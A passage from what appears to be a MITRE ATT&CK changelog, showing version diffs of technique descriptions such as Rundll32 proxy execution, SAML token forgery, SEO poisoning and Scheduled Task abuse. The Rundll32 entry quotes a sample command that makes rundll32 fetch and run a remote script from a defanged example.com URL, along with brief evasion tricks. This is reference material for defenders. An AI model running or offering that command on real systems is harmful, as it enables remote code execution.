| ques (such as changing DLL file names, file extensions, or f | | /code>). Additionally, adversaries may use [Masquerading](h |
| unction names) to further conceal execution of a malicious p | | ttps://attack.mitre.org/techniques/T1036) techniques (such a |
| ayload.(Citation: rundll32.exe defense evasion) | | s changing DLL file names, file extensions, or function name |
| | | s) to further conceal execution of a malicious payload.(Cita |
| | | tion: rundll32.exe defense evasion) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-08-14 15:35:28.965000+00:00 | 2024-10-14 13:14:43.083000+00:00 |
description | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction} ).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser . Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction , rundll32.exe would first attempt to execute ExampleFunctionW , or failing that ExampleFunctionA , before loading ExampleFunction ). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1 ).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction} ).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser . Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction , rundll32.exe would first attempt to execute ExampleFunctionW , or failing that ExampleFunctionA , before loading ExampleFunction ). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1 ).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
external_references[3]['url'] | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ | https://www.stormshield.com/news/poweliks-command-line-confusion/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.2 | 2.3 |
[T1565.003] Data Manipulation: Runtime Data Manipulation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-25 19:24:18.545000+00:00 | 2024-10-15 18:21:43.760000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1606.002] Forge Web Credentials: SAML Tokens
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
t | An adversary may forge SAML tokens with any permissions clai | t | An adversary may forge SAML tokens with any permissions clai |
| ms and lifetimes if they possess a valid SAML token-signing | | ms and lifetimes if they possess a valid SAML token-signing |
| certificate.(Citation: Microsoft SolarWinds Steps) The defau | | certificate.(Citation: Microsoft SolarWinds Steps) The defau |
| lt lifetime of a SAML token is one hour, but the validity pe | | lt lifetime of a SAML token is one hour, but the validity pe |
| riod can be specified in the <code>NotOnOrAfter</code> value | | riod can be specified in the <code>NotOnOrAfter</code> value |
| of the <code>conditions ...</code> element in a token. This | | of the <code>conditions ...</code> element in a token. This |
| value can be changed using the <code>AccessTokenLifetime</c | | value can be changed using the <code>AccessTokenLifetime</c |
| ode> in a <code>LifetimeTokenPolicy</code>.(Citation: Micros | | ode> in a <code>LifetimeTokenPolicy</code>.(Citation: Micros |
| oft SAML Token Lifetimes) Forged SAML tokens enable adversar | | oft SAML Token Lifetimes) Forged SAML tokens enable adversar |
| ies to authenticate across services that use SAML 2.0 as an | | ies to authenticate across services that use SAML 2.0 as an |
| SSO (single sign-on) mechanism.(Citation: Cyberark Golden SA | | SSO (single sign-on) mechanism.(Citation: Cyberark Golden SA |
| ML) An adversary may utilize [Private Keys](https://attack. | | ML) An adversary may utilize [Private Keys](https://attack. |
| mitre.org/techniques/T1552/004) to compromise an organizatio | | mitre.org/techniques/T1552/004) to compromise an organizatio |
| n's token-signing certificate to create forged SAML tokens. | | n's token-signing certificate to create forged SAML tokens. |
| If the adversary has sufficient permissions to establish a n | | If the adversary has sufficient permissions to establish a n |
| ew federation trust with their own Active Directory Federati | | ew federation trust with their own Active Directory Federati |
| on Services (AD FS) server, they may instead generate their | | on Services (AD FS) server, they may instead generate their |
| own trusted token-signing certificate.(Citation: Microsoft S | | own trusted token-signing certificate.(Citation: Microsoft S |
| olarWinds Customer Guidance) This differs from [Steal Applic | | olarWinds Customer Guidance) This differs from [Steal Applic |
| ation Access Token](https://attack.mitre.org/techniques/T152 | | ation Access Token](https://attack.mitre.org/techniques/T152 |
| 8) and other similar behaviors in that the tokens are new an | | 8) and other similar behaviors in that the tokens are new an |
| d forged by the adversary, rather than stolen or intercepted | | d forged by the adversary, rather than stolen or intercepted |
| from legitimate users. An adversary may gain administrativ | | from legitimate users. An adversary may gain administrativ |
| e Azure AD privileges if a SAML token is forged which claims | | e Entra ID privileges if a SAML token is forged which claims |
| to represent a highly privileged account. This may lead to | | to represent a highly privileged account. This may lead to |
| [Use Alternate Authentication Material](https://attack.mitre | | [Use Alternate Authentication Material](https://attack.mitre |
| .org/techniques/T1550), which may bypass multi-factor and ot | | .org/techniques/T1550), which may bypass multi-factor and ot |
| her authentication protection mechanisms.(Citation: Microsof | | her authentication protection mechanisms.(Citation: Microsof |
| t SolarWinds Customer Guidance) | | t SolarWinds Customer Guidance) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-01 17:55:56.116000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy .(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance) | An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy .(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance) |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[4] | Google Workspace | Identity Provider |
x_mitre_platforms[3] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
[T1608.006] Stage Capabilities: SEO Poisoning
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may poison mechanisms that influence search engi | t | Adversaries may poison mechanisms that influence search engi |
| ne optimization (SEO) to further lure staged capabilities to | | ne optimization (SEO) to further lure staged capabilities to |
| wards potential victims. Search engines typically display re | | wards potential victims. Search engines typically display re |
| sults to users based on purchased ads as well as the site’s | | sults to users based on purchased ads as well as the site’s |
| ranking/score/reputation calculated by their web crawlers an | | ranking/score/reputation calculated by their web crawlers an |
| d algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SE | | d algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SE |
| O) To help facilitate [Drive-by Compromise](https://attack. | | O) To help facilitate [Drive-by Compromise](https://attack. |
| mitre.org/techniques/T1189), adversaries may stage content t | | mitre.org/techniques/T1189), adversaries may stage content t |
| hat explicitly manipulates SEO rankings in order to promote | | hat explicitly manipulates SEO rankings in order to promote |
| sites hosting their malicious payloads (such as [Drive-by Ta | | sites hosting their malicious payloads (such as [Drive-by Ta |
| rget](https://attack.mitre.org/techniques/T1608/004)) within | | rget](https://attack.mitre.org/techniques/T1608/004)) within |
| search engines. Poisoning SEO rankings may involve various | | search engines. Poisoning SEO rankings may involve various |
| tricks, such as stuffing keywords (including in the form of | | tricks, such as stuffing keywords (including in the form of |
| hidden text) into compromised sites. These keywords could be | | hidden text) into compromised sites. These keywords could be |
| related to the interests/browsing habits of the intended vi | | related to the interests/browsing habits of the intended vi |
| ctim(s) as well as more broad, seasonably popular topics (e. | | ctim(s) as well as more broad, seasonably popular topics (e. |
| g. elections, trending news).(Citation: ZScaler SEO)(Citatio | | g. elections, trending news).(Citation: ZScaler SEO)(Citatio |
| n: Atlas SEO) Adversaries may also purchase or plant incomi | | n: Atlas SEO) In addition to internet search engines (such |
| ng links to staged capabilities in order to boost the site’s | | as Google), adversaries may also aim to manipulate specific |
| calculated relevance and reputation.(Citation: MalwareBytes | | in-site searches for developer platforms (such as GitHub) to |
| SEO)(Citation: DFIR Report Gootloader) SEO poisoning may a | | deceive users towards [Supply Chain Compromise](https://att |
| lso be combined with evasive redirects and other cloaking me | | ack.mitre.org/techniques/T1195) lures. In-site searches will |
| chanisms (such as measuring mouse movements or serving conte | | rank search results according to their own algorithms and m |
| nt based on browser user agents, user language/localization | | etrics such as popularity(Citation: Chexmarx-seo) which may |
| settings, or HTTP headers) in order to feed SEO inputs while | | be targeted and gamed by malicious actors.(Citation: Checkma |
| avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Ci | | rx-oss-seo) Adversaries may also purchase or plant incoming |
| tation: Sophos Gootloader) | | links to staged capabilities in order to boost the site’s c |
| | | alculated relevance and reputation.(Citation: MalwareBytes S |
| | | EO)(Citation: DFIR Report Gootloader) SEO poisoning may als |
| | | o be combined with evasive redirects and other cloaking mech |
| | | anisms (such as measuring mouse movements or serving content |
| | | based on browser user agents, user language/localization se |
| | | ttings, or HTTP headers) in order to feed SEO inputs while a |
| | | voiding scrutiny from defenders.(Citation: ZScaler SEO)(Cita |
| | | tion: Sophos Gootloader) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-13 20:35:52.302000+00:00 | 2024-08-14 15:03:56.383000+00:00 |
description | Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader) | Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_contributors[0] | Goldstein Menachem | Menachem Goldstein |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Chexmarx-seo', 'description': 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming the Star Ranking Game. Retrieved June 18, 2024.', 'url': 'https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7'} |
external_references | | {'source_name': 'Checkmarx-oss-seo', 'description': 'Yehuda Gelb. (2024, April 10). New Technique to Trick Developers Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.', 'url': 'https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/'} |
[T1505.001] Server Software Component: SQL Stored Procedures
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-25 23:30:20.638000+00:00 | 2024-10-15 16:05:24.007000+00:00 |
external_references[1]['description'] | Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019. | Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12, 2024. |
external_references[1]['url'] | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ | https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ |
external_references[5]['description'] | Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019. | Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved September 12, 2024. |
external_references[5]['url'] | https://blog.netspi.com/attacking-sql-server-clr-assemblies/ | https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/ |
x_mitre_version | 1.0 | 1.1 |
[T1595.001] Active Scanning: Scanning IP Blocks
Current version: 1.1
Version changed from: 1.0 → 1.1
New Detections:
- DS0029: Network Traffic (Network Traffic Content)
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Diego Sappa, Securonix'] |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-15 03:19:38.469000+00:00 | 2024-10-15 13:46:55.039000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_data_sources | | Network Traffic: Network Traffic Content |
[T1053.005] Scheduled Task/Job: Scheduled Task
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
t | Adversaries may abuse the Windows Task Scheduler to perform | t | Adversaries may abuse the Windows Task Scheduler to perform |
| task scheduling for initial or recurring execution of malici | | task scheduling for initial or recurring execution of malici |
| ous code. There are multiple ways to access the Task Schedul | | ous code. There are multiple ways to access the Task Schedul |
| er in Windows. The [schtasks](https://attack.mitre.org/softw | | er in Windows. The [schtasks](https://attack.mitre.org/softw |
| are/S0111) utility can be run directly on the command line, | | are/S0111) utility can be run directly on the command line, |
| or the Task Scheduler can be opened through the GUI within t | | or the Task Scheduler can be opened through the GUI within t |
| he Administrator Tools section of the Control Panel. In some | | he Administrator Tools section of the Control Panel.(Citatio |
| cases, adversaries have used a .NET wrapper for the Windows | | n: Stack Overflow) In some cases, adversaries have used a .N |
| Task Scheduler, and alternatively, adversaries have used th | | ET wrapper for the Windows Task Scheduler, and alternatively |
| e Windows netapi32 library to create a scheduled task. The | | , adversaries have used the Windows netapi32 library and [Wi |
| deprecated [at](https://attack.mitre.org/software/S0110) uti | | ndows Management Instrumentation](https://attack.mitre.org/t |
| lity could also be abused by adversaries (ex: [At](https://a | | echniques/T1047) (WMI) to create a scheduled task. Adversari |
| ttack.mitre.org/techniques/T1053/002)), though <code>at.exe< | | es may also utilize the Powershell Cmdlet `Invoke-CimMethod` |
| /code> can not access tasks created with <code>schtasks</cod | | , which leverages WMI class `PS_ScheduledTask` to create a s |
| e> or the Control Panel. An adversary may use Windows Task | | cheduled task via an XML path.(Citation: Red Canary - Atomic |
| Scheduler to execute programs at system startup or on a sche | | Red Team) An adversary may use Windows Task Scheduler to e |
| duled basis for persistence. The Windows Task Scheduler can | | xecute programs at system startup or on a scheduled basis fo |
| also be abused to conduct remote Execution as part of Latera | | r persistence. The Windows Task Scheduler can also be abused |
| l Movement and/or to run a process under the context of a sp | | to conduct remote Execution as part of Lateral Movement and |
| ecified account (such as SYSTEM). Similar to [System Binary | | /or to run a process under the context of a specified accoun |
| Proxy Execution](https://attack.mitre.org/techniques/T1218), | | t (such as SYSTEM). Similar to [System Binary Proxy Executio |
| adversaries have also abused the Windows Task Scheduler to | | n](https://attack.mitre.org/techniques/T1218), adversaries h |
| potentially mask one-time execution under signed/trusted sys | | ave also abused the Windows Task Scheduler to potentially ma |
| tem processes.(Citation: ProofPoint Serpent) Adversaries ma | | sk one-time execution under signed/trusted system processes. |
| y also create "hidden" scheduled tasks (i.e. [Hide Artifacts | | (Citation: ProofPoint Serpent) Adversaries may also create |
| ](https://attack.mitre.org/techniques/T1564)) that may not b | | |